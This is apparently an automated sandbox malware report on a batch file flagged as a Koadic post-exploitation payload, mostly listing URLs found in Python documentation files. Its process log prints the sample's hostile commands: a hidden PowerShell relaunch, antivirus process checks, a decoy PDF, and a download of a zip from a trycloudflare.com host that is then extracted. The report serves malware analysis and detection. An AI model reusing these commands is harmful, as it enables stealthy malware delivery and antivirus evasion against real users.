                Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823076447.00000242BC750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: git.py.24.drString found in binary or memory: https://github.com/pypa/pip/issues/1130
                Source: bytes.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/bytes.rst
                Source: contextvars.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/contextvars.rst
                Source: gcsupport.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/gcsupport.rst
                Source: iterator.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/iterator.rst
                Source: sys.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/sys.rst
                Source: typehints.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/typehints.rst
                Source: time.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/time.rst
                Source: token.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/token.rst
                Source: tomllib.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tomllib.rst
                Source: unittest.mock.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock.rst
                Source: urllib.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/urllib.rst
                Source: xml.dom.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.dom.rst
                Source: xml.etree.elementtree.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.etree.elementtree.rst
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xmlrpc.client.rst
                Source: expressions.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/expressions.rst
                Source: 2.0.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/2.0.rst
                Source: 2.4.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/2.4.rst
                Source: 3.1.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.1.rst
                Source: 3.4.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.4.rst
                Source: 3.7.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.7.rst
                Source: 3.7.html.24.drString found in binary or memory: https://github.com/python/cpython/blob/v3.7.13/.travis.yml
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://github.com/python/cpython/issues/61441
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://github.com/python/cpython/issues/78851
                Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr, 3.8.html.24.drString found in binary or memory: https://github.com/python/cpython/issues/87451
                Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.drString found in binary or memory: https://github.com/python/cpython/issues/88048
                Source: _pylong.py.24.drString found in binary or memory: https://github.com/python/cpython/issues/90716
                Source: expressions.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/base_events.py
                Source: token.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/token.py
                Source: tomllib.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tomllib
                Source: unittest.mock.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py
                Source: urllib.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/urllib/
                Source: xml.dom.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/dom/__init__.py
                Source: xml.etree.elementtree.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/etree/ElementTree.py
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xmlrpc/client.py
                Source: 3.7.html.24.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Tools/ssl/multissltests.py
                Source: 3.7.html.24.drString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/
                Source: 3.1.html.24.drString found in binary or memory: https://json.org/
                Source: 3.7.html.24.drString found in binary or memory: https://mail.python.org/pipermail/python-dev/2017-December/151283.html
                Source: time.html.24.drString found in binary or memory: https://manpages.debian.org/pthread_getcpuclockid(3)
                Source: time.html.24.drString found in binary or memory: https://manpages.debian.org/strftime(3)
                Source: time.html.24.drString found in binary or memory: https://manpages.debian.org/tzfile(5)
                Source: powershell.exe, 0000000D.00000002.1819134442.00000242B4732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: 2.0.html.24.dr, general.html.24.drString found in binary or memory: https://peps.python.org/
                Source: 2.0.html.24.drString found in binary or memory: https://peps.python.org/pep-0001/
                Source: expressions.html.24.dr, programming.html.24.dr, controlflow.html.24.dr, editors.html.24.drString found in binary or memory: https://peps.python.org/pep-0008/
                Source: 3.7.html.24.dr, windows.html2.24.drString found in binary or memory: https://peps.python.org/pep-0011/
                Source: 2.0.html.24.drString found in binary or memory: https://peps.python.org/pep-0100/
                Source: 2.0.html.24.drString found in binary or memory: https://peps.python.org/pep-0201/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0218/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0237/
                Source: expressions.html.24.drString found in binary or memory: https://peps.python.org/pep-0255/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0289/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0292/
                Source: 3.1.html.24.dr, import.html.24.drString found in binary or memory: https://peps.python.org/pep-0302/
                Source: expressions.html.24.drString found in binary or memory: https://peps.python.org/pep-0308/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0318/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0322/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0324/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0327/
                Source: 2.4.html.24.dr, import.html.24.drString found in binary or memory: https://peps.python.org/pep-0328/
                Source: 2.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0331/
                Source: expressions.html.24.drString found in binary or memory: https://peps.python.org/pep-0342/
                Source: 3.1.html.24.drString found in binary or memory: https://peps.python.org/pep-0372/
                Source: 3.1.html.24.drString found in binary or memory: https://peps.python.org/pep-0378/
                Source: expressions.html.24.drString found in binary or memory: https://peps.python.org/pep-0380/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0428/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0429/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0432/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0435/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0443/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0446/
                Source: expressions.html.24.drString found in binary or memory: https://peps.python.org/pep-0448/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0450/
                Source: 3.4.html.24.dr, import.html.24.drString found in binary or memory: https://peps.python.org/pep-0451/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0453/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-0454/
                Source: time.html.24.drString found in binary or memory: https://peps.python.org/pep-0475/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0479/
                Source: 3.7.html.24.dr, controlflow.html.24.dr, 3.6.html.24.dr, typing.html.24.dr, 3.8.html.24.drString found in binary or memory: https://peps.python.org/pep-0484/
                Source: expressions.html.24.dr, 3.6.html.24.drString found in binary or memory: https://peps.python.org/pep-0492/
                Source: expressions.html.24.dr, 3.6.html.24.drString found in binary or memory: https://peps.python.org/pep-0525/
                Source: 3.7.html.24.dr, 3.6.html.24.dr, typing.html.24.dr, 3.8.html.24.drString found in binary or memory: https://peps.python.org/pep-0526/
                Source: expressions.html.24.dr, 3.6.html.24.drString found in binary or memory: https://peps.python.org/pep-0530/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0538/
                Source: 3.7.html.24.dr, init.html.24.drString found in binary or memory: https://peps.python.org/pep-0539/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0540/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0545/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0552/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0553/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0557/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0560/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0562/
                Source: 3.7.html.24.dr, typing.html.24.drString found in binary or memory: https://peps.python.org/pep-0563/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0564/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0564/#annex-clocks-resolution-in-python
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0565/
                Source: 3.7.html.24.drString found in binary or memory: https://peps.python.org/pep-0567/
                Source: expressions.html.24.dr, 3.8.html.24.drString found in binary or memory: https://peps.python.org/pep-0572/
                Source: sys.html.24.dr, 3.8.html.24.drString found in binary or memory: https://peps.python.org/pep-0578/
                Source: 3.7.html.24.dr, controlflow.html.24.drString found in binary or memory: https://peps.python.org/pep-3107/
                Source: 3.1.html.24.dr, 2.6.html.24.drString found in binary or memory: https://peps.python.org/pep-3116/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-3154/
                Source: 3.4.html.24.drString found in binary or memory: https://peps.python.org/pep-3156/
                Source: reporter.cpython-312.pyc.24.drString found in binary or memory: https://pip.pypa.io/warnings/backtracking
                Source: unittest.mock.html.24.dr, general.html.24.drString found in binary or memory: https://pypi.org
                Source: unittest.mock.html.24.drString found in binary or memory: https://pypi.org/project/mock
                Source: tomllib.html.24.drString found in binary or memory: https://pypi.org/project/tomli-w/
                Source: tomllib.html.24.drString found in binary or memory: https://pypi.org/project/tomlkit/
                Source: 2.0.html.24.dr, windows.html2.24.drString found in binary or memory: https://pythonce.sourceforge.net/
                Source: 2.0.html.24.drString found in binary or memory: https://pyxml.sourceforge.net/topics/howto/xml-howto.html
                Source: 3.1.html.24.drString found in binary or memory: https://pyyaml.org/
                Source: 3.7.html.24.drString found in binary or memory: https://reproducible-builds.org/
                Source: 2.0.html.24.drString found in binary or memory: https://sourceforge.net/projects/python/
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://tldp.org/HOWTO/XML-RPC-HOWTO/index.html
                Source: tomllib.html.24.drString found in binary or memory: https://toml.io
                Source: tomllib.html.24.drString found in binary or memory: https://toml.io).
                Source: tomllib.html.24.drString found in binary or memory: https://toml.io/en/
                Source: 3.7.html.24.drString found in binary or memory: https://unicode.org/reports/tr18/
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://web.archive.org/web/20060624230303/http://www.xmlrpc.com/discuss/msgReader$1208?mode=topic
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://web.archive.org/web/20130120074804/http://ontosys.com/xml-rpc/extensions.php
                Source: unittest.mock.html.24.drString found in binary or memory: https://web.archive.org/web/20200603181648/http://www.voidspace.org.uk/python/weblog/arch_d7_2010_12
                Source: 2.4.html.24.drString found in binary or memory: https://wiki.python.org/moin/PythonDecoratorLibrary
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://ws.apache.org/xmlrpc/types.html
                Source: 2.0.html.24.drString found in binary or memory: https://www.haskell.org
                Source: xml.etree.elementtree.html.24.drString found in binary or memory: https://www.iana.org/assignments/character-sets/character-sets.xhtml
                Source: time.html.24.drString found in binary or memory: https://www.nist.gov/pml/time-and-frequency-division/nist-time-frequently-asked-questions-faq#tai
                Source: xml.dom.html.24.drString found in binary or memory: https://www.omg.org/spec/PYTH/1.2/PDF
                Source: 3.4.html.24.dr, appendix.html.24.dr, unix.html.24.dr, xml.sax.utils.html.24.dr, stdlib.html.24.dr, programming.html.24.dr, controlflow.html.24.dr, windows.html.24.dr, genindex-all.html.24.dr, 3.6.html.24.dr, trace.html.24.dr, extending.html0.24.dr, genindex-C.html.24.dr, typing.html.24.dr, init.html.24.dr, 3.9.html.24.dr, memoryview.html.24.dr, windows.html2.24.dr, index.html3.24.dr, 2.6.html.24.dr, editors.html.24.drString found in binary or memory: https://www.python.org/
                Source: 2.0.html.24.drString found in binary or memory: https://www.python.org/community/sigs/current/xml-sig
                Source: 3.7.html.24.dr, 3.1.html.24.dr, expressions.html.24.dr, 2.4.html.24.dr, typehints.html.24.dr, tomllib.html.24.dr, time.html.24.dr, sys.html.24.dr, urllib.html.24.dr, contextvars.html.24.dr, unittest.mock.html.24.dr, bytes.html.24.dr, xmlrpc.client.html.24.dr, iterator.html.24.dr, gcsupport.html.24.dr, xml.etree.elementtree.html.24.dr, token.html.24.dr, 2.0.html.24.dr, xml.dom.html.24.dr, 3.4.html.24.dr, appendix.html.24.drString found in binary or memory: https://www.python.org/psf/donations/
                Source: 3.7.html.24.dr, 3.1.html.24.dr, expressions.html.24.dr, 2.4.html.24.dr, typehints.html.24.dr, tomllib.html.24.dr, time.html.24.dr, sys.html.24.dr, urllib.html.24.dr, contextvars.html.24.dr, unittest.mock.html.24.dr, bytes.html.24.dr, xmlrpc.client.html.24.dr, iterator.html.24.dr, gcsupport.html.24.dr, xml.etree.elementtree.html.24.dr, token.html.24.dr, 2.0.html.24.dr, xml.dom.html.24.dr, 3.4.html.24.dr, appendix.html.24.drString found in binary or memory: https://www.sphinx-doc.org/
                Source: 3.7.html.24.drString found in binary or memory: https://www.unicode.org/versions/Unicode11.0.0/
                Source: xmlrpc.client.html.24.drString found in binary or memory: https://xmlrpc-c.sourceforge.net/introspection.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.6:49687 version: TLS 1.2

                System Summary

                barindex
                Source: yap.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                Source: yap.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                Source: classification engineClassification label: mal76.phis.evad.winBAT@37/1077@2/2
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7028Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emdb3ctx.w1q.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" "
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: yap.batVirustotal: Detection: 13%
                Source: yap.batReversingLabs: Detection: 16%
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1568,i,3081941811078344986,2843059504850167928,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1568,i,3081941811078344986,2843059504850167928,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
